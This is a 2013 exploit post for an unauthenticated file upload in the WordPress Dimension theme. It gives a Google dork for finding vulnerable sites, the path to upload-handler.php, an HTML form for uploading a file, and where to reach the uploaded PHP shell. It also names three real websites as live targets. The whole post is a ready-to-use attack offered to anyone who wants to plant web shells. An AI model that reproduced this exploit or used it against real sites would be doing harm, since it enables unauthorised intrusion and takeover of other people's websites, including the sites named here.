Wordpress Dimension Themes CSRF File Upload Vulnerability

1. #Title : Wordpress Dimension Themes CSRF File Upload Vulnerability
2.  
3. #Author : DevilScreaM
4.  
5. #Date : 11/17/2013 - 17 November 2013
6.  
7. #Category : Web Applications
8.  
9. #Type : PHP
10.  
11. #Vendor : http://themeforest.net
12.  
13. #Download : http://themeforest.net/item/dimension-retina-responsive-multipurpose-theme/
14.  
15. #Greetz : 0day-id.com | newbie-security.or.id | Borneo Security | Indonesian Security
16. Indonesian Hacker | Indonesian Exploiter | Indonesian Cyber
17.  
18. #Thanks : ShadoWNamE | gruberr0r | Win32Conficker | Rec0ded |
19.  
20. #Tested : Mozila, Chrome, Opera -> Windows & Linux
21.  
22. #Vulnerabillity : CSRF
23.  
24. #Dork :
25.  
26. inurl:wp-content/themes/dimension
27.  
28.  
29. CSRF File Upload Vulnerability
30.  
31. Exploit & POC :
32.  
33. http://site-target/wp-content/themes/dimension/library/includes/upload-handler.php
34.  
35. Script :
36.  
37. <form enctype="multipart/form-data"
38. action="http://127.0.0.1/wp-content/themes/dimension/library/includes/upload-handler.php" method="post">
39. Your File: <input name="uploadfile" type="file" /><br />
40. <input type="submit" value="upload" />
41. </form>
42.  
43.  
44. File Access :
45.  
46. http://site-target/uploads/[years]/[month]/your_shell.php
47.  
48. Example : http://127.0.0.1/wp-content/uploads/2013/11/devilscream.php
49.  
50. Live Demo :
51.  
52. http://kevinfortuneuk.com/wp-content/themes/dimension/library/includes/upload-handler.php
53. http://boyjansen.com/wp-content/themes/dimension/library/includes/upload-handler.php
54. http://jbconsultgroup.com/wp-content/themes/dimension/library/includes/upload-handler.php